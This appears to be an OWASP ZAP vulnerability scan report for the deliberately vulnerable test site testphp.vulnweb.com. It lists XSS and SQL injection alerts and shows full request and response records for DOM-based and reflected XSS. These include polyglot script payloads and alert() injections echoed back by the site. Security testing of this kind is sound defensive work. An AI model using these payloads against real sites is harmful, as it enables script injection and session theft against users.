Risk Level | Number of Alerts |
---|---|
High
|
4
|
Medium
|
6
|
Low
|
3
|
Informational
|
5
|
Name | Risk Level | Number of Instances |
---|---|---|
Cross Site Scripting (DOM Based) | High | 18 |
Cross Site Scripting (Reflected) | High | 14 |
SQL Injection | High | 9 |
SQL Injection - MySQL | High | 5 |
.htaccess Information Leak | Medium | 4 |
Absence of Anti-CSRF Tokens | Medium | 44 |
Content Security Policy (CSP) Header Not Set | Medium | 47 |
Directory Browsing - Apache 2 | Medium | 1 |
Missing Anti-clickjacking Header | Medium | 43 |
XSLT Injection | Medium | 2 |
Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s) | Low | 69 |
Server Leaks Version Information via "Server" HTTP Response Header Field | Low | 84 |
X-Content-Type-Options Header Missing | Low | 77 |
Charset Mismatch (Header Versus Meta Content-Type Charset) | Informational | 35 |
Information Disclosure - Suspicious Comments | Informational | 1 |
Modern Web Application | Informational | 9 |
User Agent Fuzzer | Informational | 250 |
User Controllable HTML Element Attribute (Potential XSS) | Informational | 4 |
HTTP Response Code | Number of Responses |
---|---|
403 Forbidden |
2
|
404 Not Found |
660
|
405 Method Not Allowed |
20
|
200 OK |
6627
|
301 Moved Permanently |
238
|
302 Found |
235
|
Parameter Name | Type | Flags | Times Used | # Values |
---|
High |
Cross Site Scripting (DOM Based) |
---|---|
Description |
Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.
When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.
There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.
Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.
Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.
|
URL | http://testphp.vulnweb.com#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Method | GET |
Parameter | |
Attack | #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Evidence | |
Request Header - size: 213 bytes. |
GET http://testphp.vulnweb.com HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Method | GET |
Parameter | |
Attack | #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Evidence | |
Request Header - size: 347 bytes. |
GET http://testphp.vulnweb.com/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/artists.php#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Method | GET |
Parameter | |
Attack | #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Evidence | |
Request Header - size: 396 bytes. |
GET http://testphp.vulnweb.com/artists.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/ Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/artists.php?artist=3?name=abc#<img src="random.gif" onerror=alert(5397)> |
Method | GET |
Parameter | |
Attack | ?name=abc#<img src="random.gif" onerror=alert(5397)> |
Evidence | |
Request Header - size: 283 bytes. |
GET http://testphp.vulnweb.com/artists.php?artist=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/cart.php#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Method | GET |
Parameter | |
Attack | #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Evidence | |
Request Header - size: 393 bytes. |
GET http://testphp.vulnweb.com/cart.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/ Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/categories.php#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Method | GET |
Parameter | |
Attack | #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Evidence | |
Request Header - size: 399 bytes. |
GET http://testphp.vulnweb.com/categories.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/ Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/comment.php?aid=3#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Method | GET |
Parameter | |
Attack | #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Evidence | |
Request Header - size: 413 bytes. |
GET http://testphp.vulnweb.com/comment.php?aid=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/artists.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/disclaimer.php#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Method | GET |
Parameter | |
Attack | #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Evidence | |
Request Header - size: 399 bytes. |
GET http://testphp.vulnweb.com/disclaimer.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/ Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/guestbook.php#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Method | GET |
Parameter | |
Attack | #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Evidence | |
Request Header - size: 398 bytes. |
GET http://testphp.vulnweb.com/guestbook.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/ Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/index.php#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Method | GET |
Parameter | |
Attack | #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Evidence | |
Request Header - size: 394 bytes. |
GET http://testphp.vulnweb.com/index.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/ Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/listproducts.php?artist=3#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Method | GET |
Parameter | |
Attack | #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Evidence | |
Request Header - size: 297 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?artist=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php?artist=3 |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/product.php?pic=6?name=abc#<img src="random.gif" onerror=alert(5397)> |
Method | GET |
Parameter | |
Attack | ?name=abc#<img src="random.gif" onerror=alert(5397)> |
Evidence | |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=6 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=2 |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/signup.php#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Method | GET |
Parameter | |
Attack | #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Evidence | |
Request Header - size: 404 bytes. |
GET http://testphp.vulnweb.com/signup.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/login.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/userinfo.php?name=abc#<img src="random.gif" onerror=alert(5397)> |
Method | GET |
Parameter | |
Attack | ?name=abc#<img src="random.gif" onerror=alert(5397)> |
Evidence | |
Request Header - size: 263 bytes. |
GET http://testphp.vulnweb.com/userinfo.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/cart.php#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Method | POST |
Parameter | |
Attack | #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Evidence | |
Request Header - size: 347 bytes. |
POST http://testphp.vulnweb.com/cart.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com/product.php?pic=6 Content-Length: 21 |
Request Body - size: 21 bytes. |
price=10000&addcart=6
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/guestbook.php#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Method | POST |
Parameter | |
Attack | #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Evidence | |
Request Header - size: 517 bytes. |
POST http://testphp.vulnweb.com/guestbook.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 52 Origin: http://testphp.vulnweb.com Connection: keep-alive Referer: http://testphp.vulnweb.com/guestbook.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 52 bytes. |
name=anonymous+user&text=oQfJZHNE&submit=add+message
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/search.php?test=query#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Method | POST |
Parameter | |
Attack | #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Evidence | |
Request Header - size: 342 bytes. |
POST http://testphp.vulnweb.com/search.php?test=query HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Content-Length: 25 |
Request Body - size: 25 bytes. |
searchFor=ZAP&goButton=go
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testphp.vulnweb.com/userinfo.php#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Method | POST |
Parameter | |
Attack | #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e |
Evidence | |
Request Header - size: 343 bytes. |
POST http://testphp.vulnweb.com/userinfo.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com/login.php Content-Length: 18 |
Request Body - size: 18 bytes. |
uname=ZAP&pass=ZAP
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
Instances | 18 |
Solution |
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Phases: Implementation; Architecture and Design
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.
Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
Phase: Implementation
For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
|
Reference |
http://projects.webappsec.org/Cross-Site-Scripting
http://cwe.mitre.org/data/definitions/79.html |
Tags |
WSTG-v42-CLNT-01
OWASP_2021_A03 OWASP_2017_A07 |
CWE Id | 79 |
WASC Id | 8 |
Plugin Id | 40026 |
High |
Cross Site Scripting (Reflected) |
---|---|
Description |
Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.
When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.
There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.
Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.
Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.
|
URL | http://testphp.vulnweb.com/hpp/?pp=javascript%3Aalert%281%29%3B |
Method | GET |
Parameter | pp |
Attack | javascript:alert(1); |
Evidence | javascript:alert(1); |
Request Header - size: 292 bytes. |
GET http://testphp.vulnweb.com/hpp/?pp=javascript%3Aalert%281%29%3B HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/hpp/ |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:25:40 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 445 |
Response Body - size: 445 bytes. |
<title>HTTP Parameter Pollution Example</title>
<a href="?pp=12">check</a><br/> <a href="params.php?p=valid&pp=javascript%3Aalert%281%29%3B">link1</a><br/><a href="params.php?p=valid&pp=javascript:alert(1);">link2</a><br/><form action="params.php?p=valid&pp=javascript:alert(1);"><input type=submit name=aaaa/></form><br/> <hr> <a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a> |
URL | http://testphp.vulnweb.com/hpp/params.php?p=%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E&pp=12 |
Method | GET |
Parameter | p |
Attack | <scrIpt>alert(1);</scRipt> |
Evidence | <scrIpt>alert(1);</scRipt> |
Request Header - size: 327 bytes. |
GET http://testphp.vulnweb.com/hpp/params.php?p=%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E&pp=12 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/hpp/?pp=12 |
Request Body - size: 0 bytes. |
|
Response Header - size: 220 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:25:40 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 28 |
Response Body - size: 28 bytes. |
<scrIpt>alert(1);</scRipt>12
|
URL | http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E |
Method | GET |
Parameter | pp |
Attack | <scrIpt>alert(1);</scRipt> |
Evidence | <scrIpt>alert(1);</scRipt> |
Request Header - size: 330 bytes. |
GET http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/hpp/?pp=12 |
Request Body - size: 0 bytes. |
|
Response Header - size: 220 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:25:41 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 31 |
Response Body - size: 31 bytes. |
valid<scrIpt>alert(1);</scRipt>
|
